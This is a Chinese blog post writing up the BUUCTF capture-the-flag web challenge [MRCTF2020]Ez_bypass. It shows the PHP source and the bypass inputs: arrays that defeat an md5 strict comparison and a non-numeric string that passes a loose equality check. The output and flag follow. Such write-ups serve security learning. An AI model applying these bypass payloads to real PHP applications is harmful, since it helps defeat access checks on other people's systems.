BUUCTF WEB [MRCTF2020]Ez_bypass

最新推荐文章于 2024-05-20 16:12:48 发布
最新推荐文章于 2024-05-20 16:12:48 发布
阅读量432 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51412071/article/details/124243258
版权

BUUCTF WEB [MRCTF2020]Ez_bypass

  • 进入环境,提示

    I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first

  • 可以推测网站源码为

    I put something in F12 for you
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) {
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                 if($passwd==1234567)
                 {
                     echo 'Good Job!';
                     highlight_file('flag.php');
                     die('By Retr_0');
                 }
                 else
                 {
                     echo "can you think twice??";
                 }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
}
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}Please input first

  • 第一层过滤

     if (md5($id) === md5($gg) && $id !== $gg)

    可以上传数组进行绕过

    ?id[]=1&gg[]=2

    回显

    Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48

Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
You got the first steponly one way to get the flag

  • 第二层过滤

    if (!is_numeric($passwd)) {
    if($passwd==1234567) {

    此处为PHP弱类型比较,只需要上传

    passwd=1234567a

    回显

    Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48

Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
You got the first stepGood Job! <?php
    $flag="flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}"
?> By Retr_0

  • 得到flag

    flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}
Y1Daa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
360webscan.php_bypass.pdf
03-18
PHP 网站安全-Bypass 360webscan_php_bypass 在 PHP 开发中,安全问题一直是一个重要的关注点。大多数网站都需要防止恶意攻击和漏洞利用,360webscan 是一种常用的网站安全扫描工具。然而,安全专家们也需要了解...
bypass_bypass_
09-29
適用於近期之xccode之過渡偵測方式之檔案
buuctf [MRCTF2020]Ez_bypass
stantic的博客
03-20 417
id和gg的md5强比较相等,id和gg的值弱比较不相等,password不是数字并且与1234567弱比较相等,由此构建id[]=1&gg[]=2 passwd=1234567q flag{7038d50b-bff2-432d-85bc-eefe852120cc}
BUUCTF:[MRCTF2020]Ez_bypass
末初的CSDN博客
12-04 2100
https://buuoj.cn/challenges#[MRCTF2020]Ez_bypass 右键查看源代码 include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&amp
buuctf [MRCTF2020]Ez_bypass1 题解
最新发布
m0_52328368的博客
05-20 226
第一个考点是md5强绕过,因为这里是===,所以是强绕过,此时只用传入数组即可,因为md5()函数无法处理数组,传入数组会返回NULL,所以两个数组加密后都是NULL。第二个是绕过is_numeric函数,is_numeric函数传入空字符%00,判断为非数值,使用hackbar传参即可。gg[]=1&&id[]=2成功绕过md5函数。1.本题比较简单,首先打开可以看到源代码。
[MRCTF2020]Ez_bypass --BUUCTF
金 帛的博客
06-12 260
BUUCTF记录贴
buuctf[MRCTF2020]Ez_bypass
m0_52299173的博客
07-11 402
F12查看源代码: 分析: get传入两个参数gg,dd,md5加密后强比较要求相等,用数组[]绕过,这样返回两个null就相等了。 post传入passwd,要求传入值等于123456但不能是数字,构造字符串绕过。1234567a是字符串,但是弱比较的时候,1234567在前,php会将其整体转成数字,就可以通过比较了。 payload:...
BUUCTF[MRCTF2020]Ez_bypass
CrotZZ的博客
07-17 337
这道题十分简单,按要求先F12查看源码,这样看着就方便多了 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&am
XSS_Bypass_Cookbook_ver_3.0.pdf
08-07
2 Bypass Chrome XSS Auditor 2.1 字符集问题产生的bypass 2.2 过滤关键字造成的bypass 2.3 协议理解产生的bypass 2.4 标签导致的绕过 2.5 上传swf导致flash-xss所产生的bypass 2.6 crlf产生的bypass 3 各类针对...
mtk机型修复nv 授权 解包MTK_Auth_Bypass_Tool_V25+24双版合一
01-22
外网软件 mtk线刷授权 mtk机型解锁 super解包等 自带图文翻译与操作动画 解密bbs.ydss.cn
uacbypasslatest_bypassuac_UAC_
10-01
**UAC Bypass**是指绕过UAC的技术手段,这通常是为了在不被UAC警告的情况下,以管理员权限运行程序或执行某些操作。这对于渗透测试人员和恶意攻击者来说是关键技能,因为他们可能希望在目标系统上执行高权限的活动而...
BUUCTF—[MRCTF2020]Ez_bypass1
qq_57778984的博客
10-22 432
这是严格不相等运算符,它不仅会比较两个值的数值是否相等,还会比较它们的数据类型是否相等。它在比较时会进行类型转换,将操作数转换为相同的类型,然后再进行比较。:这是非严格不相等运算符,它只会比较两个值的数值是否相等,不会考虑数据类型。只要数值不相等,不论数据类型是否相同,如果传入的两个参数不是字符串,而是数组,md5()函数无法解出其数值,并且不会报错,就会得到===强比较的值相等。此时md5(para1)=== md5(para2)"==="与"==":在PHP中,最终,比较的结果是两个整数的比较,
buucft-[MRCTF2020]Ez_bypass(小宇特详解)
小宇的web博客
01-26 532
buucft-[MRCTF2020]Ez_bypass(小宇特详解) 先看题,比较乱查看源码 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) ===
web buuctf [MRCTF2020]Ez_bypass1
weixin_44214568的博客
03-16 517
考点:代码审计、弱类型比较 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg
BUUCTF闯关日记--[MRCTF2020]Ez_bypass1
qq_64201116的博客
05-14 291
进入页面有点乱,按查看页面源代码,发现是一样的而且比较整齐 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg..
Buuctf [MRCTF2020]Ez_bypass 1 WP解析
qq_60115503的博客
11-10 794
md5函数不能处理数组,处理数组会报错,就会返回null,然后经过md5就相等了,传入的参数不同,gg和id的值就不同。b=240610708,加密后为0e462097431906509019562988736854。有了回显,是一个warning的报错说明我们的GET的md5弱比较执行成功,接着审计剩下的代码。a=QNKCDZO,加密后为0e830400451993494058024219903391。=b,也满足了md5($a) == md5($b)修改后直接发送包获得flag。
BUUCTF [MRCTF2020]Ez_bypass
Chu_Jian_Xiong的博客
09-28 652
BUUCTF [MRCTF2020]Ez_bypass记录一次BUUCTF做题过程分析实操 记录一次BUUCTF做题过程 首先打开题目 将其还原,大概是这样 I put something in F12 for you <?php include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { // 传入两个GET,gg和id
[MRCTF2020]Ez_bypass
weixin_44110537的博客
10-01 238
F12查看源码 include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first ste
settings put global feedbacker_sso_bypass_token default_sso_bypass_token
05-02
这个命令是在 Android 操作系统中设置全局变量 feedbacker_sso_bypass_token 的值为 default_sso_bypass_token。这个变量用于绕过单点登录(SSO)验证,在一些情况下可以方便地进行测试和调试。但是需要注意的是,这...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值